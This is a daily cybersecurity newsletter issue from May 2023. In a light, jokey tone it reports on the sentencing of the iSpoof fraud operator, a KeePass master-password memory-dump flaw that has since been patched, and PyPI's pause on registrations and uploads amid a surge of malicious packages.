May 23 2023
Welcome to Gone Phishing, your daily cybersecurity newsletter that’s the Nate Diaz to cybercrime’s Jake Paul 🥊
Today’s hottest cyber security stories:
Notorious UK-based ‘iSpoof’ scammer jailed for 13 years. Ha! Ha!
KeePass password manager exploit exposes master passwords. D’oh!
Python Package Index (PyPI) halts sign-ups & uploads amidst cyberattack
If you haven’t heard of the iSpoof scam, let us break it down for you real quick.
So, this guy and his cronies marketed and sold some software which allowed scammers to convincingly pose as reputable businesses and organisations (mostly banks!) to defraud victims out of cash. How much cash, you ask…
Well, in the UK alone, experts estimate the losses to be as much as £48 million. Not a bad haul, eh?
And internationally? £100 million without breaking a sweat. In fact, losses globally are said to be at least £100 million. AT LEAST!
So, not a bad run for the scammers but hey ho, all bad things come to an end. And the good news is, Tejay Fletcher, 35, of Western Gateway, London, has finally been sent down for his cybercrimes against humanity. Unlucky mate!
He was handed the sentence on May 18, 2023, having pleaded guilty last month to a number of cyber offences, including facilitating fraud and possessing and transferring criminal property.
This comes some six months after iSpoof was dismantled in November 2022 as part of a coordinated law enforcement operation, resulting in the arrest of Fletcher and 168 other individuals linked to the operation.
Praise be to the cyber gods… and to the UK Metropolitan police! But how did the scam work?
In most cases, iSpoof, which as mentioned was available as a paid service, was used by fraudsters to mask their phone numbers and masquerade as representatives from banks, such as Barclays, Santander, HSBC, Lloyds, Halifax, First Direct, Natwest, Nationwide, and TSB.
The Met said, in a statement: "The website offered a number of packages for users who would buy, in Bitcoin, the number of minutes they wanted to use the software to make calls."
Detective Superintendent Helen Rance added: "By setting up iSpoof, Fletcher created a gateway for thousands of criminals to defraud innocent victims out of millions of pounds,"
"Meanwhile he was living a luxury lifestyle benefitting from the profits."
Indeed, Fletcher is believed to have made around £1.7 – £1.9 million in illicit proceeds, in addition to owning a Range Rover, a Lamborghini Urus, and high-end watches from Rolex and Audemars Piguet.
Well, to quote Eminem: Say goodbye, say goodbye to Hollywood 🎶
‘You had one job’ comes to mind, doesn’t it? This isn’t the first time a password manager has either got hacked, or as is the case with KeePass, left itself open to a hack. We covered a story not so long ago wherein Last Pass was leaking passwords left, right, and centre.
So, what’s the happs with KeePass? Well, it’s just released a patch a bit sharpish on hearing the news of a vulnerability via a proof-of-concept (PoC). So it’s another case of the cybersecurity professionals to the rescue! That’s what we like to see.
It’s not the worst cock-up we’ve ever seen, mind. Indeed, it's worth noting that successful exploitation of the flaw banks on the condition that an attacker has already compromised a potential target's computer.
And that’s not all; it also requires that the password is typed on a keyboard, and not copied from a clipboard.
So, a fair few hoops for the hacker to jump through but still when you’re a company whose primary function is cybersecurity (protecting passwords), you’ll forgive us if we hold them to a slightly higher standard, no?
Oh well, at least it’s been dealt with and that’s what good actors are there for, I guess.
Here’s what our anonymous actionhero had to say on the matter:
"Apart from the first password character, it is mostly able to recover the password in plaintext," security researcher "vdhoney," who discovered the flaw and devised a PoC, said.
"No code execution on the target system is required, just a memory dump."
"It doesn't matter where the memory comes from," the researcher added, stating, "it doesn't matter whether or not the workspace is locked.
“It is also possible to dump the password from RAM after KeePass is no longer running, although the chance of that working goes down with the time it's been since then."
KeePass has maintained that the "password database is not intended to be secure against an attacker who has that level of access to the local PC."
Uh-oh, Python’s Package Index is in trouble.
So much so that the official third-party software repository for the Python programming language has temporarily disabled the ability for users to sign up and upload new packages until further notice.
We need backup!
"The volume of malicious users and malicious projects being created on the index in the past week has outpaced our ability to respond to it in a timely fashion, especially with multiple PyPI administrators on leave," the admins said in a notice published on May 20, 2023.
No additional details about the nature of the malware and the threat actors involved in publishing those rogue packages to PyPI were disclosed.
Yep, sounds about right. Watch this space. Stay safe, y’all!
So long and thanks for reading all the phish!